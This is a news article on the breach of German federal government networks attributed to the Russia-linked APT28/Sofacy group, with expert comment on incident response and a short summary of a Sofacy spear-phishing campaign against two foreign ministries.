The group – also known as APT28, Fancy Bear, and Pawn Storm – has been targeting government institutions, political organizations and military/defense companies around the world for over a decade.
Confirmation of the breach
The confirmation of the breach came from Johannes Dimroth, a spokesman for the German Interior Ministry, but he did not comment on the possible perpetrator.
The finger-pointing was apparently made by German security forces, who are confident that hackers with links to the Russian state had originated the attacks.
Dimroth told Dpa International that government information technology and networks had been hit and that protective measures were being taken. Among the compromised networks are those of the foreign and defense ministries, the German Chancellery and the Federal Court of Auditors.
The ongoing investigation into the breach is lead by the Federal Office for Information Security (BSI) and the Federal Office for the Protection of the Constitution (BfV) and aided by Germany’s foreign intelligence service.
For the moment, it is known that the breach was spotted in December 2017, and it’s likely that the infiltration lasted for quite some time.
“This disclosure from the German Interior Ministry highlights that every organization can be targeted and hacked, regardless of its sector or industry. What continues to be key is how prepared organizations are to respond if all prevention techniques that have been deployed fail,” says Matthias Maier, Security Evangelist, Splunk.
“In this instance, the authorities, supported by specialists, need to investigate what happened over a year ago in their environment to identify how the attacker got in, what the weak point was, what was accessed and what systems might have been compromised. Hopefully, the organization has collected and stored all log data from its entire digital infrastructure in order to put these pieces of the puzzle together. The reports so far in the news have indicated that the detection happened in December and it continues to be investigated, highlighting the complexity involved in such a process.”
It is believed to consist of members who are either Russian citizens or citizens of a neighboring country that speak Russian, and the targets they’ve hit over the years point to the group’s promotion of Russian national interests.
Palo Alto Networks researchers have published on Wednesday details about an attack targeting two Ministries of Foreign Affairs that they believe to be the work of the Sofacy hackers.
“One organization is geographically located in Europe and the other in North America,” the company’s researchers shared.
The attacks, spotted in early February 2018, takes the form of spear-phishing emails carrying a Microsoft Excel XLS document containing a malicious macro script. The script downloads a loader Trojan, which then downloads a variant of the SofacyCarberp downloader Trojan, which can then be used to download additional malware on the compromised systems.